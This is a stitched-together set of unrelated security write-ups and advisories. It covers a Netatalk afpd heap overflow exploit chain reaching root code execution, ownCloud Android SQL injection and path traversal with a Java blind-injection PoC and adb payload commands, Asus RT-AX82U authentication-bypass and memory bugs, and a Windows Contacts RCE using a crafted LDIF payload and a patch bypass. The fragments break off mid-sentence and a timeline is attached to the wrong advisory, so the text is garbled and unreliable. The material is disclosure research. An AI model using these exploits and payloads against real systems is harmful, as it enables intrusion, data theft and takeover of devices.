Zero’ing the TCP windows of the client side, letting the remote one think our buffer is full ;
Stopping sending ACK packets for the server replies.
This strategy seems effective enough and the exploit manages to enter the wanted codepath within a few seconds.
Writing a custom TCP stack
To achieve the described strategy we needed to re-implement a TCP networking stack. Because we did not want to get into low-levels details, we decided to use scapy [6] and implemented it in Python over raw sockets.
The class
RawTCP
of the exploit is the result of this development. It is basic and slow and it does not handle most of the specific aspects of TCP (such as packets re-ordering and re-transmission). However, because we expect the targeted device to be in the same network without networking reliability issues, the current implementation is stable enough.
The most noteworthy details of
RawTCP
is the attribute
reply_with_ack
that could be set to 0 to stop sending ACK and
window
that is used to advertise the current buffer size.
One prerequisite of our exploit is that the attacker kernel must be «muzzled down» so that it doesn’t try to interpret incoming and unexpected TCP segments. Indeed the Linux TCP stack is not aware of our shenanigans on the TCP connection and he will try to kill it by sending RST packets.
One can prevent Linux from sending RST packets to the target, with an iptables rule like this:
To sum up, here is how we managed to trigger the bug. The code implementing this is located in the function
do_overflow
of the exploit:
Open a session by sending DSIOpenSession.
In a bulk, send a lot of DSICommand requests with the logout function 0x14 to force the server to get into dsi_cmdreply(). From our tests 3000 commands seems enough for the targeted hardware.
Simulate a congestion by advertising a TCP windows size of 0 while stopping to ACK reply the server replies. After a short while the server should be stuck in dsi_peek() being only capable of receiving data.
Send a DSI dummy and invalid command with a dsi_len and payload larger than 64KB. This command is received in dsi_peek() and later consumed in dsi_stream_receive() / dsi_stream_read() / buf_read(). In the exploit we use the command id DSIFUNC_MAX+1 to enter the default case of the afp_over_dsi() switch.
Send a block of raw data larger than 64KB. This block is also received in dsi_peek() while the server is blocked but is consumed in dsi_writeinit() by overflowing dsi->data and the tail of the dsi struct.
Start to acknowledge again the server replies (3000) by sending ACK back and a proper TCP window size. This triggers the handling of the logout commands that were not handled before the obstruction, then the invalid command to reach the overflow.
The whole process is done pretty quickly in a few seconds, depending on the setup (usually less than 15s).
GETTING A LEAK
To exploit the server, we need to know where the main binary (apfd) is loaded in memory. The server runs with Address Space Layout Randomization (ASLR) enabled, therefore the base address of apfd changes each time the server gets started. Fortunately for us, apfd forks before handling a client connection, so the base address will remain the same across all connections even if we crash a forked process.
In order to defeat ASLR, we need to leak a pointer to some known memory location in the apfd binary. To obtain this leak, we can use the overflow to corrupt the tail of the
dsi
struct (after the data buffer) to force the server to send us more data than expected. The command replay cache feature of the server provides a convenient way to do so.
When the server receives the same command twice (same
clientID
and
function
), it takes the replay cache code path which calls
dsi_cmdreply()
without initializing
dsi->datalen
. So in that case,
dsi_cmdreply()
will send
dsi->datalen
bytes of
dsi->data
back to the client in
dsi_stream_send()
.
This is fortunate because the
datalen
field is located just after the data buffer in the struct DSI. That means that to control
datalen
we just need to trigger the overflow with 65536 + 4 bytes (4 being the size of a size_t).
Then, by sending a
DSICommand
command with an already used
clientID
we reach a
dsi_cmdreply()
that can send back all the
dsi->data
buffer, the tail of the
dsi
struct and part of the following heap data. In the
dsi
struct tail, we get some heap pointers such as
dsi->buffer
,
dsi->start
,
dsi->eof
,
dsi->end
. This is useful because we now know where client controlled data is stored. In the following heap data, we hopefully expect to find pointers into afpd main image.
From our experiments we found out that most of the time, by requesting a leak of 2MB+64KB we get parts of the heap where
structure is very distinct from other data and contains pointers on the
hnode_alloc()
and
hnode_free()
functions that are located in the afpd main image. Therefore by parsing the received leak, we can look for
hash_t
patterns and recover the ASLR slide of the main binary. This method is implemented in the exploit in the function
parse_leak()
.
Regrettably this strategy is not 100% reliable depending on the heap initialization of afpd. There might be non-mapped memory ranges after the
dsi
struct, crashing the daemon while trying to send the leak. In that case, the exploit won’t work until the device (or daemon) get restarted. Fortunately, this situation seems rare (less than 20% of the cases) giving the exploit a fair chance of success.
BUILDING A WRITE PRIMITIVE
Now that we know where the main image and heap are located into the server memory, it is possible to use the full potential of the vulnerability and overflow the rest of the
struct *DSI
to reach code execution.
Rewriting
dsi->proto_close
looks like a promising way to get the control of the flow. However because of the lack of control on the arguments, we’ve chosen another exploitation method that works equally well on all architectures but requires the ability to write arbitrary data at a chosen location.
The look ahead pointers of the
DSI
structure seem like a nice opportunity to achieve a controlled write.
typedef struct DSI {
/* ... */
uint8_t data[DSI_DATASIZ];
size_t datalen, cmdlen; /* begining of the overflow */
off_t read_count, write_count;
uint32_t flags; /* DSI flags like DSI_SLEEPING, DSI_DISCONNECTED */
int socket; /* AFP session socket */
int serversock; /* listening socket */
/* DSI readahead buffer used for buffered reads in dsi_peek */
size_t dsireadbuf; /* size of the DSI readahead buffer used in dsi_peek() */
char *buffer; /* buffer start */
char *start; /* current buffer head */
char *eof; /* end of currently used buffer */
char *end;
/* ... */
} DSI;
By setting
dsi->buffer
to the location we want to write and
dsi->end
as the upper bound of the writing location, the next command buffered by the server can end-up at a controlled address.
One should takes care while setting
dsi->start
and
dsi->eof
, because they are reset to
dsi->buffer
after the overflow in
dsi_writeinit()
:
if (dsi->eof > dsi->start) {
/* We have data in the buffer */
bytes = MIN(dsi->eof - dsi->start, dsi->datasize);
memmove(buf, dsi->start, bytes);
dsi->start += bytes; // the overflowed value is changed back here ...
dsi->datasize -= bytes;
if (dsi->start >= dsi->eof)
dsi->start = dsi->eof = dsi->buffer; // ... and there
}
As seen in the snippet, this is only a matter of setting
dsi->start
greater than
dsi->eof
during the overflow.
So to get a write primitive one should:
Overflow
dsi->buffer
,
dsi->end
,
dsi->start
and
dsi->eof
according to the write location.
Send two commands in the same TCP segment.
The first command is just a dummy one, and the second command contains the data to write.
Sending two commands here seems odd but it it necessary to trigger the arbitrary write, because of the convoluted reception mechanism of
dsi_stream_read()
.
When receiving the first command,
dsi_buffered_stream_read()
will skip the non-blocking call to
recv()
and take the blocking receive path in
dsi_stream_read()
->
buf_read()
->
readt()
.
The controlled write happens during the reception of the second command. Because the two commands were sent in the same TCP segment, the data of the second one is most likely to be available on the socket. Therefore the non-blocking
recv()
should succeed and write at
dsi->eof
.
COMMAND EXECUTION
With the ability to write arbitrary data at a chosen location it is now possible to take control of the remote program.
The most obvious location to write to is the array
. This function is used by the server to launch a shell command, and can even do so with root privileges 🙂
int afprun(int root, char *cmd, int *outfd)
{
pid_t pid;
uid_t uid = geteuid();
gid_t gid = getegid();
/* point our stdout at the file we want output to go into */
if (outfd && ((*outfd = setup_out_fd()) == -1)) {
return -1;
}
/* ... */
if ((pid=fork()) < 0) { /* ... */ }
/* ... */
/* now completely lose our privileges. This is a fairly paranoid
way of doing it, but it does work on all systems that I know of */
if (root) {
become_user_permanently(0, 0);
uid = gid = 0;
}
else {
become_user_permanently(uid, gid);
}
/* ... */
execl("/bin/sh","sh","-c",cmd,NULL);
/* not reached */
exit(82);
return 1;
}
So to get a command executed as root, we transform the call:
As a final optimization, it is even possible to send the last two DSI packets triggering code execution as the last two commands required for the write primitive. This results in doing the
preauth_switch
overwrite and the
dsi->command
,
dsi->cmdlen
setup at the same time. As a matter of fact, this is even easier to mix both because of a detail that is not worth explaining into that write-up. The interested reader can refer to the exploit commentaries.
PUTTING THINGS TOGETHER
To sum up here is an overview of the exploitation process:
Setting up the connection.
Triggering the vulnerability with a 4 bytes overflow to rewrite
dsi->datalen.
Sending a command with a previously used
clientID
to trigger the leak.
Parsing the leak while looking for
hash_t
struct, giving pointers to the afpd main image.
Closing the old connection and setting up a new connection.
Triggering the vulnerability with a larger overflow to rewrite the look ahead buffer pointers of the
During this research we developed a working exploit for the latest version of Netatalk. It uses a single heap overflow vulnerability to bypass all mitigations and obtain command execution as root. On the MyCloud Home the afpd services was configured to allow guest authentication, but since the bug was accessible prior to authentication the exploit works even if guest authentication is disabled.
The funkiest part was undoubtedly implementing a custom TCP stack to trigger the bug. This is quite uncommon for an user land and real life (as not in a CTF) exploit, and we hope that was entertaining for the reader.
Our exploit will be published on GitHub after a short delay. It should work as it on the targeted device. Adapting it to other distributions should require some minor tweaks and is left as an exercise.
Unfortunately, our Pwn2Own entry ended up being a duplicate with the Mofoffensive team who targeted another device that shipped an older version of Netatalk. In this previous release the vulnerability was in essence already there, but maybe a little less fun to exploit as it did not required to mess with the network stack.
We would like to thank:
ZDI and Western Digital for their organization of the P2O competition, especially this session considering the number of teams and their help to setup an environment for our exploit ;
The Netatalk team for the considerable amount of work and effort they put into this Open Source project.
TIMELINE
2022-06-03 — Vulnerability reported to vendor
2023-02-06 — Coordinated public release of advisory
2022-07-26: Issues notified to ownCloud through HackerOne.
2022-08-01: Report receipt acknowledged.
2022-09-07: We request a status update for GHSL-2022-059.
2022-09-08: ownCloud says that they are still working on the fix for GHSL-2022-059.
2022-10-26: We request a status update for GHSL-2022-060.
2022-10-27: ownCloud says that they are still working on the fix for GHSL-2022-060.
2022-11-28: We request another status update for GHSL-2022-059.
2022-11-28: ownCloud says that the fix for GHSL-2022-059 will be published in the next release.
2022-12-12: Version 3.0 is published.
2022-12-20: We verify that version 3.0 fixed GHSL-2022-060.
2022-12-20: We verify that the fix for GHSL-2022-059 was not included in the release. We ask ownCloud about it.
2023-01-31: ownCloud informs us that in 3.0 the filelist database was deprecated (empty, only used for migrations from older versions) and planned to be removed in a future version.
2023-01-31: We answer that, while that would mitigate one of the reported injections, the other one affects the
All tables in this content provider can be freely interacted with by other apps in the same device. By reviewing the entry-points of the content provider for those tables, it can be seen that several user-controller parameters end up reaching an unsafe SQL method that allows for SQL injection.
The
delete
method
User input enters the content provider through the three parameters of this method:
There are two databases affected by this vulnerability:
filelist
and
owncloud_database
.
Since the tables in
filelist
are affected by the injections in the
insert
and
update
methods, an attacker can use those to insert a crafted row in any table of the database containing data queried from other tables. After that, the attacker only needs to query the crafted row to obtain the information (see the
Resources
section for a PoC). Despite that, currently all tables are legitimately exposed through the content provider itself, so the injections cannot be exploited to obtain any extra data. Nonetheless, if new tables were added in the future that were not accessible through the content provider, those could be accessed using these vulnerabilities.
Regarding the tables in
owncloud_database
, there are two that are not accessible through the content provider:
room_master_table
and
folder_backup
. An attacker can exploit the vulnerability in the
query
method to exfiltrate data from those. Since the
strictMode
is enabled in the
query
method, the attacker needs to use a Blind SQL injection attack to succeed (see the
Resources
section for a PoC).
In both cases, the impact is information disclosure. Take into account that the tables exposed in the content provider (most of them) are arbitrarily modifiable by third party apps already, since the
FileContentProvider
is exported and does not require any permissions.
Resources
SQL injection in
filelist
The following PoC demonstrates how a malicious application with no special permissions could extract information from any table in the
By providing a columnName and tableName to the exploit function, the attacker takes advantage of the issues explained above to:
Create a new file entry in
FileContentProvider
.
Exploit the SQL Injection in the
update
method to set the
path
of the recently created file to the values of
columnName
in the table
tableName
.
Query the
path
of the modified file entry to obtain the desired values.
Delete the file entry.
For instance,
exploit(context, "name", "SQLITE_MASTER WHERE type="table")
would return all the tables in the
filelist
database.
Blind SQL injection in
owncloud_database
The following PoC demonstrates how a malicious application with no special permissions could extract information from any table in the
owncloud_database
database exploiting the issues mentioned above using a Blind SQL injection technique:
package com.example.test;
import android.content.Context;
import android.database.Cursor;
import android.net.Uri;
import android.util.Log;
public class OwncloudProviderExploit {
public static String blindExploit(Context ctx) {
String output = "";
String chars = "abcdefghijklmopqrstuvwxyz0123456789";
while (true) {
int outputLength = output.length();
for (int i = 0; i < chars.length(); i++) {
char candidate = chars.charAt(i);
String attempt = String.format("%s%c%s", output, candidate, "%");
try (Cursor mCursor = ctx.getContentResolver().query(
Uri.parse("content://org.owncloud/shares"),
null,
"'a'=? AND (SELECT identity_hash FROM room_master_table) LIKE '" + attempt + "'",
new String[]{"a"}, null)) {
if (mCursor == null) {
Log.e("ProviderHelper", "mCursor is null");
return "0";
}
if (mCursor.getCount() > 0) {
output += candidate;
Log.i("evil", output);
break;
}
}
}
if (output.length() == outputLength)
break;
}
return output;
}
}
Issue 2: Insufficient path validation in
ReceiveExternalFilesActivity.java
(
GHSL-2022-060
)
Access to arbitrary files in the app’s internal storage fix bypass
ReceiveExternalFilesActivity
handles the upload of files provided by third party components in the device. The received data can be set arbitrarily by attackers, causing some functions that handle file paths to have unexpected behavior. https://hackerone.com/reports/377107 shows how that could be exploited in the past, using the
"android.intent.extra.STREAM
extra to force the application to upload its internal files, like
With those payloads, the original issue can be still exploited with the same impact.
Write of arbitrary
.txt
files in the app’s internal storage
Additionally, there’s another insufficient path validation when uploading a plain text file that allows to write arbitrary files in the app’s internal storage.
When uploading a plain text file, the following code is executed, using the user-provided text at
, it can be seen that the plain text file is momentarily saved in the app’s cache, but the destination path is built using the user-provided
fileName
:
ReceiveExternalFilesActivity:983
private Uri savePlainTextToFile(String fileName) {
Uri uri = null;
String content = getIntent().getStringExtra(Intent.EXTRA_TEXT);
try {
File tmpFile = new File(getCacheDir(), fileName); // here
FileOutputStream outputStream = new FileOutputStream(tmpFile);
outputStream.write(content.getBytes());
outputStream.close();
uri = Uri.fromFile(tmpFile);
} catch (IOException e) {
Timber.w(e, "Failed to create temp file for uploading plain text: %s", e.getMessage());
}
return uri;
}
An attacker can exploit this using a path traversal attack to write arbitrary text files into the app’s internal storage or other restricted directories accessible by it. The only restriction is that the file will always have the
.txt
extension, limiting the impact.
Impact
These issues may lead to information disclosure when uploading the app’s internal files, and to arbitrary file write when uploading plain text files (although limited by the
.txt
extension).
Resources
The following PoC demonstrates how to upload arbitrary files from the app’s internal storage:
adb shell am start -n com.owncloud.android.debug/com.owncloud.android.ui.activity.ReceiveExternalFilesActivity -t "text/plain" -a "android.intent.action.SEND" --eu "android.intent.extra.STREAM" "file:///data/user/0/com.owncloud.android.debug/cache/../shared_prefs/com.owncloud.android.debug_preferences.xml"
The following PoC demonstrates how to upload arbitrary files from the app’s internal
files
directory:
adb shell am start -n com.owncloud.android.debug/com.owncloud.android.ui.activity.ReceiveExternalFilesActivity -t "text/plain" -a "android.intent.action.SEND" --eu "android.intent.extra.STREAM" "content://org.owncloud.files/files/owncloud/logs/owncloud.2022-07-25.log"
The following PoC demonstrates how to write an arbitrary
test.txt
text file to the app’s internal storage:
adb shell am start -n com.owncloud.android.debug/com.owncloud.android.ui.activity.ReceiveExternalFilesActivity -t "text/plain" -a "android.intent.action.SEND" --es "android.intent.extra.TEXT" "Arbitrary contents here" --es "android.intent.extra.TITLE" "../shared_prefs/test"
An authentication bypass vulnerability exists in the get_IFTTTTtoken.cgi functionality of Asus RT-AX82U 3.0.0.4.386_49674-ge182230. A specially-crafted HTTP request can lead to full administrative access to the device. An attacker would need to send a series of HTTP requests to exploit this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
The Asus RT-AX82U router is one of the newer Wi-Fi 6 (802.11ax)-enabled routers that also supports mesh networking with other Asus routers. Like basically every other router, it is configurable via a HTTP server running on the local network. However, it can also be configured to support remote administration and monitoring in a more IOT style.
In order to enable remote management and monitoring of our Asus Router, so that it behaves just like any other IoT device, there are a couple of settings changes that need to be made. First we must enable WAN access for the HTTPS server (or else nothing could manage the router), and then we must generate an access code to link our device with either Amazon Alexa or IFTTT. These options can all be found internally at
As a high level overview, upon receiving this code, the remote website will connect to your router at the
get_IFTTTtoken.cgi
web page and provide a
shortToken
HTTP query parameter. Assuming this token is received within 2 minutes of the aforementioned access code being generated, and also assuming this token matches what’s in the router’s nvram, the router will respond back with an
ifttt_token
that grants full administrative capabilities to the device, just like the normal token used after logging into the device via the HTTP server.
At [1], the function pulls out the “User-Agent” header of our HTTP GET request and checks to see if it starts with “asusrouter”. It also checks if the text after the second dash is either “IFTTT” or “Alexa”. In either of those cases, it returns 4 or 5, and we’re allowed to proceed in the code path. At [2], the function pulls out the
shortToken
query parameter from our HTTP GET request and passes that into the
gen_IFTTTtoken
function at [3]. Assuming there is a match,
gen_IFTTTtoken
will output the
ifttt_token
authentication buffer to
var_30
, which is then sent back to the HTTP sender at [4]. Looking at
With the unimportant code cut out, we are left with a somewhat clear view of the generation process. At [8] a random number is generated that is then moded against 0xFF. This number is then transformed into a binary string of length 8 (e.g. ‘00101011’). A lot further down at [9], this
randbinstrptr
is converted back to an integer and fed into a call to
snprintf(&ifttt_token, 0x80, "%o", ...)
, which generates the octal version of our original number. With this in mind, we can clearly see that the keyspace for the
ifttt_stoken
is only 255 possibilities, which makes brute forcing the
ifttt_stoken
a trivial matter. While normally this would not be a problem, since the
ifttt_stoken
can only be used for two minutes after generation, we can see a flaw in this scheme if we take a look at the
ifttt_timestamp
’s creation. At [10] we can clearly see that it is the
We can see that the current uptime is used against the uptime of the generated token. Unfortunately for the device,
uptime
starts from when the device was booted, so if the device ever restarts or reboots for any reason, the
ifttt_stoken
suddenly becomes valid again since the current uptime will most likely be less than the
uptime()
call at the point of
ifttt_stoken
generation. Neither the
ifttt_timestamp
or the
ifttt_stoken
are ever cleared from nvram, even if the Amazon Alexa and IFTTT setting are disabled, and so the device will remain vulnerable from the moment of first generation of the configuration.
Asus RT-AX82U cfg_server cm_processREQ_NC information disclosure vulnerability
An information disclosure vulnerability exists in the cm_processREQ_NC opcode of Asus RT-AX82U 3.0.0.4.386_49674-ge182230 router’s configuration service. A specially-crafted network packets can lead to a disclosure of sensitive information. An attacker can send a network request to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
The Asus RT-AX82U router is one of the newer Wi-Fi 6 (802.11ax)-enabled routers that also supports mesh networking with other Asus routers. Like basically every other router, it is configurable via a HTTP server running on the local network. However, it can also be configured to support remote administration and monitoring in a more IOT style.
The
cfg_server
and
cfg_client
binaries living on the Asus RT-AX82U are both used for easy configuration of a mesh network setup, which can be done with multiple Asus routers via their GUI. Interestingly though, the
cfg_server
binary is bound to TCP and UDP port 7788 by default, exposing some basic functionality. The TCP port and UDP ports have different opcodes, but for our sake, we’re only dealing with the TCP opcodes which look like such:
field, not the rest of the headers. Regardless, this particular request gets responded to with the server’s public RSA key. This RSA key is needed in order to send a valid
cm_processREQ_NC
[2] packet, which is where our bug is. The
cm_processREQ_NC
request is a bit complex, but the structure is given below:
Trimming out all the error cases, we start from where the server starts reading the bytes decrypted with its RSA private key. All the fields have their endianess reversed, and the sub-request type is checked at [8]. A size check at [9] prevents us from doing anything silly with the length field in our master_key message, and a CRC check occurs at [10]. Finally the
sess_block->master_key
allocation occurs at [11] with a size that is provided by our packet.
Now, an important fact about AES encryption is that the key is always a fixed size, and for AES_256, our key needs to be 0x20 bytes. As noted above however, there’s not actually any explicit length check to make sure the provided
master_key
is 0x20 bytes. Thus, if we provide a
master_key
that’s say, 0x4 bytes, a
malloc
,
memset
and
memcpy
of size 0x4 will occur.
aes_encrypt
will read 0x20 bytes from the start of our
master_key
’s heap allocation, resulting in an out-of-bound read and assorted heap data being included into the AES key that encrypts the response. While not exactly a straight-forward leak, we can figure out these bytes if we slowly oracle them out. Since we know what the last bytes of the response should be (the
client_nonce
that we provide), we can simply give a
master_key
that’s 0x1F bytes, and then brute force the last byte locally, trying to decrypt the response with each of the 0xFF possibilities until we get one that correctly decrypts. Since we know the last byte, we can then move onto the second-to-last byte, and so-on and so forth, until we get useful data.
While the malloc that occurs can go into a different bucket based on the size of our provided
master_key
, heuristically it seems that the same heap chunk is returned with a
master_key
of less than 0x1E bytes. A different chunk is returned if the key is 0x1F or 0x1E bytes long. If we thus give a key of 0x1D bytes, we have to brute-force 3 bytes at once, which takes a little longer but is still doable. After that we can go byte-by-byte again and leak important information such as thread stack addresses.
A denial of service vulnerability exists in the cfg_server cm_processConnDiagPktList opcode of Asus RT-AX82U 3.0.0.4.386_49674-ge182230 router’s configuration service. A specially-crafted network packet can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
The Asus RT-AX82U router is one of the newer Wi-Fi 6 (802.11ax)-enabled routers that also supports mesh networking with other Asus routers. Like basically every other router, it is configurable via a HTTP server running on the local network. However, it can also be configured to support remote administration and monitoring in a more IOT style.
The
cfg_server
and
cfg_client
binaries living on the Asus RT-AX82U are both used for easy configuration of a mesh network setup, which can be done with multiple Asus routers via their GUI. Interestingly though, the
cfg_server
binary is bound to TCP and UDP port 7788 by default, exposing some basic functionality. The TCP port and UDP ports have different opcodes, but for our sake, we’re only dealing with a particular set of ConnDiag opcodes which look like such:
At [1], the server reads in 0x7ff bytes from its UDP 7788 port, and at [2] and [3], the data is then copied from the stack over to a cleared-out heap allocation of size 0x824. Assuming the first four bytes of the input packet are “\x00\x00\x00\x06”, then the packet gets added to a particular linked list structure, the
connDiagUdpList
. Before we continue on though, it’s appropriate to list out the structure of the input packet:
At [5], the actual length of the input packet minus twelve is compared against the length field inside the packet itself [6]. Assuming they match, the CRC is then checked, another field provided in the packet itself. A flaw is present in this function, however, in that there is a check missing in this code path that can be seen in both the TCP and UDP handlers: the code needs to verify that the size of the received packet is >= 0xC bytes. Thus, if a packet is received that is less than 0xC bytes, the
dlenle
field at [5] underflows to somewhere between
0xFFFFFFFC
and
0xFFFFFFFF
. The check against the length field [6] can be easily bypassed by just correctly putting the underflowed length inside the packet. The CRC check at [7] isn’t an issue, since if the
bufsize
parameter is less than zero, it automatically skips CRC calculation. Since a CRC skip results in a return value of 0x0, we need to make sure that the
crc
field is “\x00\x00\x00\x00”. Conveniently, this is handled already for us if our packet is only 8 bytes long, since the buffer that the packet lives in was
memset
to 0x0 beforehand.
While we can pass all the above checks with an 8-byte packet, it does prevent us from having any control over what occurs after. We end up hitting
This is the story about another forgotten 0day fully disclosed more than 4 years ago by John Page (aka hyp3rlinx). To understand the report, you have to consider i’m stupid 🙂 And my stupidicity drives me to take longer paths to solve simple issues, but it also leads me to figure out another ways to exploit some bugs. Why do i say this? Because i was unable to quickly understand that the way to create a .contact file is just browsing to Contact folder in order to create the contact, instead of that, i used this info to first create a VCF file and then, i wrongly thought that this was some type of variant. That was also because of my brain can’t understand some 0days are forgotten for so long time ¯\(ツ)/¯ Once done that and after the «wontfix» replies by MSRC and ZDI, further investigations were made to increase the severity, finally reaching out .contact files and windows url protocol handler «ldap».
Details
Vendor: Microsoft.
App: Microsoft Windows Contacts.
Version: 10.0.19044.1826.
Tested systems: Windows 10 & Windows 11.
Tested system versions: Microsoft Windows [Version 10.0.19044.1826] & Microsoft Windows [Version 10.0.22000.795]
Intro
While i was reading the exploit code for this vulnerability which was actually released as 0day and it’s possible to find ZDI’s report.
Update 2022/07/21: After reporting this case to MS, MSRC’s folks rightly pointed me out Windows Contacts isn’t the default program to open VCF files.
Further research still demonstrates the default program for VCF files on Win7 ESU & WinServer2019 is Windows Contacts (wab.exe), otherwise MS People (PeopleApp.exe) is used. Here is a full table of this testing:
Windows 7: Default program for VCF files is Windows Contacts (wab.exe).
Windows Server 2019: Default program for VCF files is Windows Contacts (wab.exe).
Windows 10: Default program for VCF files is MS People (PeopleApp.exe).
Windows 10 + MS Office: Default program for VCF files is MS Outlook (outlook.exe).
Windows 11: Default program for VCF files is MS People (PeopleApp.exe).
Anyway they still argue there’s some social engineering involved such as opening a crafted VCF file and clicking on some links to exploit the bug so doesn’t meet the MSRC bug bar for a security update.
Update 2022/07/25: Well, after further research, it’s the same bug. I’ve been finally able to find a .contact proof of concept. It’s actually possible to correctly parse a .contact file using HTML entities. Note this solves the previous issue (Update 2022/07/21) and this file format (.contact) is opened by Windows Contacts, default program for this file extension, even when MS Office is installed in the system. It just needs a first file association if hasn’t yet been done, but the only program installed by default to do that is Windows Contacts.
Update 2022/07/25: This further research made me to reach a point that i was trying to reach some time ago: Use some URL protocol handler to automatically open crafted contact data to exploit the bug. I was finally able to get it working thanks to ldap uri scheme, which is associated by default to Windows Contacts application, so just setting a rogue LDAP server up and serving the payload data under mail, url or wwwhomepage attributes, the exploiting impact is increased because now it’s not needed to double click a malicious VCF/Contact file, we can deliver this using url protocols.
The report basically is the same than above links, however i’ve improved a bit the social engineering involved. In fact, the first thing that i made was to improve the way the links are seen, just like it were a XSS vulnerability, it’s actually an HTML injection so it’s possible to close the first anchor element and insert a new one. Then, i wanted to remove the visibility for those HTML elements so just setting as long «innerHTML» as possible would be enough to hide them (because of there are char limits).
Just going further and while testing rundll32 as attack vector, just noticed it was not possible to use arguments with the payload executable selected. However using a lnk file which targets a chosen executable, it was possible to use cmdline arguments. It’s a bit tricky but it works.
This looks more interesting because it’s not needed to drop an executable in the target system.
Impact
Remote Code Execution as the current user logged.
Proofs of Concept
It has to exist file association to use Windows Contacts to open .vcf files.
Update 2021/07/25: For Contact files (.contact) there is only one application to open them by default: Windows Contacts, even when MS Office is installed in the target system.
dllmain.cpp: DLL library used as payload (payload.bin).
payload.cpp: Executable used as payload (payload.exe).
Further exploitation
For further exploitation and as the vulnerability doesn’t allow to load remote shared location files, uri protocol «search-ms» is an interesting vector. You’ll find proofs of concept which only trigger a local binary like calc or notepad and more complex proofs of concept that i’ve named as weaponized exploit, because of they don’t execute local files. These pocs & exploits are located in ./further-pocs/.
Modify file exploit.html/poc.html located in ./further-pocs/[vector or target app]/remote-weaponized-by-searchms/ to point to your remote shared location.
Start a webserver in the target app path, that is: ./further-pocs/[vector or target app]/[poc||remote-weaponized-by-searchms]/.
Run poc/exploit files depending on the case.
For further info, watch the videos located in ./videos:
After receiving Update 2022/07/21 from MSRC’s, i decided to take a look into Contact file extension as it would confirm whether or not it’s the same case as that found by the original discoverer, and of course it is. My first proof of concept was just using a different file format, but the bug is the same. Just using wabmig.exe located in «C:\Program Files\Windows Mail» is possible to convert all the VCF files to Contact files.
And as mentioned in the intro updates, these files are opened by Windows Contacts (default program).
The steps to reproduce are the same than those used for VCF files. Same restrictions observed on VCF files are applied with Contact files, that is, it’s not possible to use remote shared locations for the attribute «href» but it’s still possible to use local paths or url protocol «search-ms».
These are all the files added or modified to exploit Contact files:
As mentioned above, this further research made me to reach a point that i was trying to reach some time ago: Use some URL protocol handler to automatically open crafted contact data to exploit the bug. This challenge was finally achieved thanks to ldap uri scheme.
So just setting a rogue LDAP server up and serving the payload data, it’s possible to use this url protocol handler to launch Windows Contacts (wab.exe) with a malicious payload in the ldif attributes mail, url or wwwhomepage. Note that i was unable to do this working on the attribute «wwwhomepage» as indicated here, but it should theorically work.
The crafted ldif content is just something like this:
...
dn: dc=org
dc: org
objectClass: dcObject
dn: dc=example,dc=org
dc: example
objectClass: dcObject
objectClass: organization
dn: ou=people,dc=example,dc=org
objectClass: organizationalUnit
ou: people
dn: cn=Microsoft,ou=people,dc=example,dc=org
cn: Microsoft
gn: Microsoft
company: Microsoft
title: Microsoft KB5001337-hotfix
mail:"></a><a href="..\hidden\payload.lnk">Run-installer...</a>
url:"></a><a href="..\hidden\payload.exe">Run-installer...</a>
wwwhomepage:"></a><a href="notepad">Run-installer...</a>
objectclass: top
objectclass: person
objectClass: inetOrgPerson
...
And the code for the rogue ldap server was taken borrowed from the quick start server of ldaptor project, located over here.
This is a summary of target applications:
Browsers: MS Edge, Google Chrome, Mozilla Firefox & Opera.
MS Word.
PDF Readers (mainly Adobe Acrobat Reader DC & Foxit PDF Reader).
The steps to reproduce are:
Copy ./further-pocs into remote shared location (SMB or WebDav).
./further-pocs/ldap-rogue-server/ldap-server.py: Python script based on the server sample for ldaptor, which runs on Python 2.7, and serves the crafted data to exploit the bug through the ldif attributes mail, url and wwwhomepage.
CVE-2022-44666: Patch analysis and incomplete fix
On Dec 13, 2022 the patch for this vulnerability was released by Microsoft as CVE-2022-44666.
The versions used for diffing the patch (located in C:\Program Files\Common Files\System\wab32.dll) have been:
This function first checks if the URL is valid in (5), then, it checks whether or not it starts with «http» or «https» in (6). This code path looks safe enough. Coming back to the function «fnSummaryProc», there’s another code path that could help to bypass the fix in (3).
One thing caught my attention about this in (7), where the code is checking whether it exists a char «@». Then, it calls to the function «IsDomainName» in order to check whether or not the string after the char «@» is a domain name:
__int64 __fastcall IsDomainName(unsigned __int16 *a1, int a2, int a3)
{
int v3; // edi
int v4; // ebx
int v5; // er9
__int64 v6; // rdx
v3 = a3;
v4 = a2;
if ( !a1 )
return 0i64;
LABEL_2:
v5 = *a1;
if ( !(_WORD)v5 || (_WORD)v5 == 0x2E || v4 && (_WORD)v5 == 0x3E )
return 0i64;
while ( (_WORD)v5 && (!v4 || (_WORD)v5 != 0x3E) )
{
if ( (unsigned __int16)v5 >= 0x80u )
return 0i64;
if ( (unsigned __int16)(v5 - 10) <= 0x36u )
{
v6 = 19140298416324617i64;
if ( _bittest64(&v6, (unsigned int)(v5 - 10)) )
return 0i64;
}
if ( (_WORD)v5 == 46 )
{
a1 = CharNextW(a1);
if ( a1 )
goto LABEL_2;
return 0i64;
}
a1 = CharNextW(a1);
v5 = *a1;
}
if ( v4 )
{
if ( (_WORD)v5 != 0x3E )
return 0i64;
if ( v3 )
*a1 = 0;
}
return 1i64;
}
So the bypass for the fix is pretty simple. It’s just necessary to use a single char «@». Symlink href attributes like these will successfully bypass the fix:
The target user has to belong to administrator group. If not, there’s a UAC prompt.
The diagcab file has to be signed, so the codesigning certificate must have been installed in the target computer.
A real attack scenario would pass for stealing a code signing certificate which is in fact installed in the target system. But as this is just a proof of concept, a self-signed code signing certificate was generated and used to sign the diagcab file named as @payload.diagcab.
So in order to repro, it’s needed to install the certificate located in cert.cer under Trusted Root Certificate Authority like this:
To finally elevate the priveleges, a token stealing/impersonation could be used. In this case, «parent process» technique was the chosen one. A modified version for this script was included inside the resolver scripts.
Remember the vulnerable code in the function «fnSummaryProc»:
...
LABEL_44:
SafeExecute(v29, v24, v30); // Vulnerable call to shellexecute
return 1i64;
}
}
else
{
if ( v23 )
v32 = IsInternetAddress(v23, &v38); // Bypass with a single "@"
else
v32 = 0;
v29 = v7;
if ( v32 )
{
v30 = v23;
goto LABEL_44;
}
}
...
